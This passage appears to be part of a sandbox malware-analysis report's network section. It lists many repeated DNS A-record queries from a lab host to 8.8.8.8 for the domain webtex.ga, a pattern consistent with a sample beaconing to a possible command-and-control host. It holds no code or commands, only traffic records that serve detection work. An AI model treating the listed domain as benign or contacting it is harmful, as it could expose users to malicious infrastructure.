                                    Dec 3, 2020 10:04:25.729907990 CET6409253192.168.2.38.8.8.8
                                    Dec 3, 2020 10:04:25.756966114 CET53640928.8.8.8192.168.2.3

                                    DNS Queries

                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                    Dec 3, 2020 10:02:28.585885048 CET192.168.2.38.8.8.80x9dc0Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:29.235055923 CET192.168.2.38.8.8.80xcbccStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:29.554157019 CET192.168.2.38.8.8.80xc90eStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:30.093907118 CET192.168.2.38.8.8.80xf2d3Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:30.440342903 CET192.168.2.38.8.8.80x8338Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:31.059484959 CET192.168.2.38.8.8.80x6d5Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:31.465171099 CET192.168.2.38.8.8.80x9e60Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:31.770330906 CET192.168.2.38.8.8.80xd5d3Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:32.094156981 CET192.168.2.38.8.8.80x74e9Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:32.416392088 CET192.168.2.38.8.8.80x6a4Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:32.708549976 CET192.168.2.38.8.8.80xd74Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:33.007380962 CET192.168.2.38.8.8.80x5d50Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:33.324595928 CET192.168.2.38.8.8.80x1da8Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:33.646433115 CET192.168.2.38.8.8.80x8589Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:34.000180006 CET192.168.2.38.8.8.80x7eabStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:34.313985109 CET192.168.2.38.8.8.80xf473Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:34.770662069 CET192.168.2.38.8.8.80x35eeStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:35.186542034 CET192.168.2.38.8.8.80xce9dStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:35.972059011 CET192.168.2.38.8.8.80x6755Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:36.264887094 CET192.168.2.38.8.8.80x9615Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:36.717093945 CET192.168.2.38.8.8.80xa2f9Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:38.498115063 CET192.168.2.38.8.8.80x88f3Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:38.826427937 CET192.168.2.38.8.8.80x42fbStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:39.146038055 CET192.168.2.38.8.8.80xb789Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:39.479924917 CET192.168.2.38.8.8.80x5b0fStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:39.794024944 CET192.168.2.38.8.8.80xc726Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:40.109395027 CET192.168.2.38.8.8.80xd319Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:40.415194988 CET192.168.2.38.8.8.80xc211Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:40.703869104 CET192.168.2.38.8.8.80xdd07Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:41.027050972 CET192.168.2.38.8.8.80x8454Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:41.361510038 CET192.168.2.38.8.8.80x1398Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:41.670005083 CET192.168.2.38.8.8.80x70e5Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:41.976327896 CET192.168.2.38.8.8.80x7f1fStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:42.270056009 CET192.168.2.38.8.8.80x3748Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:42.604676962 CET192.168.2.38.8.8.80x1726Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:42.928745985 CET192.168.2.38.8.8.80x602dStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:43.225001097 CET192.168.2.38.8.8.80x24ebStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:43.561017036 CET192.168.2.38.8.8.80x238dStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:43.881627083 CET192.168.2.38.8.8.80x9a51Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:44.201263905 CET192.168.2.38.8.8.80xe7c4Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:44.502989054 CET192.168.2.38.8.8.80x65e4Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:44.972174883 CET192.168.2.38.8.8.80x70f3Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:45.313241005 CET192.168.2.38.8.8.80xbe0dStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:45.632884026 CET192.168.2.38.8.8.80x4443Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:45.958441973 CET192.168.2.38.8.8.80x44adStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:46.264465094 CET192.168.2.38.8.8.80x21bdStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:46.572137117 CET192.168.2.38.8.8.80x55ddStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:46.884318113 CET192.168.2.38.8.8.80x5c7cStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:47.159286976 CET192.168.2.38.8.8.80x2b96Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:47.451164007 CET192.168.2.38.8.8.80xf13cStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:47.757059097 CET192.168.2.38.8.8.80xca9dStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:48.072316885 CET192.168.2.38.8.8.80xa946Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:48.382123947 CET192.168.2.38.8.8.80xbab1Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:48.664874077 CET192.168.2.38.8.8.80xe678Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:48.953640938 CET192.168.2.38.8.8.80xe05fStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:49.240653038 CET192.168.2.38.8.8.80x7be3Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:49.537837982 CET192.168.2.38.8.8.80x5ed8Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:50.012649059 CET192.168.2.38.8.8.80xa25Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:50.312208891 CET192.168.2.38.8.8.80x3f42Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:50.616952896 CET192.168.2.38.8.8.80x58ceStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:50.912763119 CET192.168.2.38.8.8.80x2a57Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:51.202581882 CET192.168.2.38.8.8.80x9ccaStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:51.474638939 CET192.168.2.38.8.8.80x2077Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:51.791898012 CET192.168.2.38.8.8.80x99f5Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:52.069417953 CET192.168.2.38.8.8.80x8296Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:52.393465042 CET192.168.2.38.8.8.80x8f91Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:52.717830896 CET192.168.2.38.8.8.80x3392Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:53.049109936 CET192.168.2.38.8.8.80xa6edStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:53.412718058 CET192.168.2.38.8.8.80x4d4Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:53.700769901 CET192.168.2.38.8.8.80xb873Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:54.064919949 CET192.168.2.38.8.8.80xa277Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:54.348299980 CET192.168.2.38.8.8.80xd645Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:54.633327961 CET192.168.2.38.8.8.80x1694Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:55.265343904 CET192.168.2.38.8.8.80x7c88Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:55.642606020 CET192.168.2.38.8.8.80xa1c1Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:57.107584953 CET192.168.2.38.8.8.80x8e9cStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:57.453136921 CET192.168.2.38.8.8.80xfea6Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:57.861424923 CET192.168.2.38.8.8.80x3f28Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:58.165703058 CET192.168.2.38.8.8.80x1e87Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:58.471180916 CET192.168.2.38.8.8.80x7da4Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:58.767008066 CET192.168.2.38.8.8.80x26b0Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:59.063576937 CET192.168.2.38.8.8.80x41a9Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:59.332727909 CET192.168.2.38.8.8.80x1b27Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:59.620688915 CET192.168.2.38.8.8.80x9482Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:59.915173054 CET192.168.2.38.8.8.80x4379Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:00.208374977 CET192.168.2.38.8.8.80x59c6Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:00.489223003 CET192.168.2.38.8.8.80x15e8Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:01.522310972 CET192.168.2.38.8.8.80x15e8Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:01.962356091 CET192.168.2.38.8.8.80x2857Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:02.265445948 CET192.168.2.38.8.8.80x34c8Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:02.565130949 CET192.168.2.38.8.8.80xae95Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:02.839083910 CET192.168.2.38.8.8.80xcd57Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:03.107460022 CET192.168.2.38.8.8.80xc3ffStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:03.453428984 CET192.168.2.38.8.8.80x54f1Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:03.796557903 CET192.168.2.38.8.8.80xb71bStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:04.060163975 CET192.168.2.38.8.8.80x6edfStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:04.340807915 CET192.168.2.38.8.8.80x832aStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:04.846359015 CET192.168.2.38.8.8.80xd28eStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:05.140671015 CET192.168.2.38.8.8.80x355Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:05.526319027 CET192.168.2.38.8.8.80x2882Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:05.999557018 CET192.168.2.38.8.8.80x43dfStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:06.272005081 CET192.168.2.38.8.8.80x803eStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:06.923021078 CET192.168.2.38.8.8.80x95f7Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:07.196409941 CET192.168.2.38.8.8.80xba9fStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:07.464982033 CET192.168.2.38.8.8.80xc3ecStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:07.766259909 CET192.168.2.38.8.8.80x5723Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:08.061608076 CET192.168.2.38.8.8.80x28aStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:08.342209101 CET192.168.2.38.8.8.80x8aefStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:08.640106916 CET192.168.2.38.8.8.80x4a5cStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:08.922322035 CET192.168.2.38.8.8.80xeebaStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:09.202274084 CET192.168.2.38.8.8.80x52ffStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:09.503087044 CET192.168.2.38.8.8.80x64a0Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:09.788084984 CET192.168.2.38.8.8.80xbdd8Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:10.242281914 CET192.168.2.38.8.8.80x220bStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:10.629410982 CET192.168.2.38.8.8.80xb11bStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:11.015091896 CET192.168.2.38.8.8.80x8a65Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:11.502537012 CET192.168.2.38.8.8.80x3590Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:11.768229008 CET192.168.2.38.8.8.80x82c7Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:12.141284943 CET192.168.2.38.8.8.80x460bStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:12.443948030 CET192.168.2.38.8.8.80x7c2aStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:12.813215971 CET192.168.2.38.8.8.80xf60bStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:13.089744091 CET192.168.2.38.8.8.80x220eStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:13.933495998 CET192.168.2.38.8.8.80xd70eStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:15.775830030 CET192.168.2.38.8.8.80x51d9Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:16.220994949 CET192.168.2.38.8.8.80xf658Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:16.659768105 CET192.168.2.38.8.8.80xe36dStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:17.074780941 CET192.168.2.38.8.8.80xf6aStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:17.538553953 CET192.168.2.38.8.8.80xb93Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:18.230065107 CET192.168.2.38.8.8.80x663fStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:18.976856947 CET192.168.2.38.8.8.80x4f9Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:19.320147991 CET192.168.2.38.8.8.80x6067Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:19.815073967 CET192.168.2.38.8.8.80xc41fStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:20.114562035 CET192.168.2.38.8.8.80x67b4Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:20.585319996 CET192.168.2.38.8.8.80xc411Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:20.865005970 CET192.168.2.38.8.8.80x135fStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:21.350702047 CET192.168.2.38.8.8.80x7c7aStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:21.938216925 CET192.168.2.38.8.8.80x7a9bStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:22.212102890 CET192.168.2.38.8.8.80x2061Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:22.710444927 CET192.168.2.38.8.8.80x9a2dStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:22.973746061 CET192.168.2.38.8.8.80x5736Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:23.470324039 CET192.168.2.38.8.8.80x2777Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:23.971995115 CET192.168.2.38.8.8.80x10d0Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:24.629245996 CET192.168.2.38.8.8.80xb2fcStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:25.133505106 CET192.168.2.38.8.8.80xf47fStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:25.611252069 CET192.168.2.38.8.8.80xc2deStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:26.139666080 CET192.168.2.38.8.8.80x2c89Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:26.750502110 CET192.168.2.38.8.8.80xec75Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:27.020617962 CET192.168.2.38.8.8.80x37feStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:27.542334080 CET192.168.2.38.8.8.80xee9Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:28.052023888 CET192.168.2.38.8.8.80x268cStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:28.320911884 CET192.168.2.38.8.8.80xa636Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:28.947045088 CET192.168.2.38.8.8.80xb2a4Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:29.212243080 CET192.168.2.38.8.8.80xcf41Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:29.856785059 CET192.168.2.38.8.8.80x19d2Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:30.428265095 CET192.168.2.38.8.8.80x4f6bStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:30.940175056 CET192.168.2.38.8.8.80xe5a7Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:31.211011887 CET192.168.2.38.8.8.80x22c0Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:31.701210022 CET192.168.2.38.8.8.80x1998Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:31.965411901 CET192.168.2.38.8.8.80xbd1bStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:32.553005934 CET192.168.2.38.8.8.80x5335Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:32.813930035 CET192.168.2.38.8.8.80x235eStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:33.387254000 CET192.168.2.38.8.8.80xccc0Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:33.887957096 CET192.168.2.38.8.8.80xc68eStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:34.397080898 CET192.168.2.38.8.8.80xdef7Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:34.893606901 CET192.168.2.38.8.8.80xfaf1Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:35.446471930 CET192.168.2.38.8.8.80xa930Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:35.982255936 CET192.168.2.38.8.8.80xea6eStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:36.558135033 CET192.168.2.38.8.8.80x7bf5Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:37.046510935 CET192.168.2.38.8.8.80xeb1bStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:37.585237980 CET192.168.2.38.8.8.80x58c7Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:38.089342117 CET192.168.2.38.8.8.80x8c94Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:38.558370113 CET192.168.2.38.8.8.80xf10dStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:39.105139017 CET192.168.2.38.8.8.80x640dStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:39.622893095 CET192.168.2.38.8.8.80x2773Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:39.961132050 CET192.168.2.38.8.8.80x1327Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:40.350091934 CET192.168.2.38.8.8.80xb392Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:40.643349886 CET192.168.2.38.8.8.80xd79cStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:40.917800903 CET192.168.2.38.8.8.80x2d9bStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:41.210357904 CET192.168.2.38.8.8.80x2b7dStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:41.501154900 CET192.168.2.38.8.8.80x9e39Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:41.788903952 CET192.168.2.38.8.8.80xbac6Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:42.078183889 CET192.168.2.38.8.8.80x91f1Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:42.745702982 CET192.168.2.38.8.8.80xabc8Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:43.046442032 CET192.168.2.38.8.8.80x1b62Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:43.359462976 CET192.168.2.38.8.8.80xef30Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:43.637032032 CET192.168.2.38.8.8.80xf5dbStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:43.957545042 CET192.168.2.38.8.8.80x66a8Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:44.347207069 CET192.168.2.38.8.8.80x3076Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:44.619749069 CET192.168.2.38.8.8.80xa64fStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:44.920094967 CET192.168.2.38.8.8.80x18d1Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:45.199316978 CET192.168.2.38.8.8.80x16fcStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:45.705465078 CET192.168.2.38.8.8.80xf333Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:46.270900965 CET192.168.2.38.8.8.80x8a44Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:46.745162964 CET192.168.2.38.8.8.80x24bdStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:47.266988039 CET192.168.2.38.8.8.80x44edStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:47.829632998 CET192.168.2.38.8.8.80xa991Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:48.394521952 CET192.168.2.38.8.8.80x7ed0Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:48.946424961 CET192.168.2.38.8.8.80xed25Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:49.333678007 CET192.168.2.38.8.8.80x1f9bStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:49.653568029 CET192.168.2.38.8.8.80xdd43Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:50.292429924 CET192.168.2.38.8.8.80x4dcbStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:50.652407885 CET192.168.2.38.8.8.80x3c4cStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:51.184968948 CET192.168.2.38.8.8.80xc3f4Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:51.697694063 CET192.168.2.38.8.8.80x9b59Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:51.962105036 CET192.168.2.38.8.8.80x1acaStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:52.491959095 CET192.168.2.38.8.8.80xcf36Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:53.082986116 CET192.168.2.38.8.8.80xa9feStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:53.692517996 CET192.168.2.38.8.8.80xbf15Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:53.964230061 CET192.168.2.38.8.8.80x86cdStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:54.522007942 CET192.168.2.38.8.8.80xb35eStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:55.105586052 CET192.168.2.38.8.8.80xf4fStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:55.802597046 CET192.168.2.38.8.8.80xa750Standard query (0)webtex.gaA (IP address)IN (0x0001)
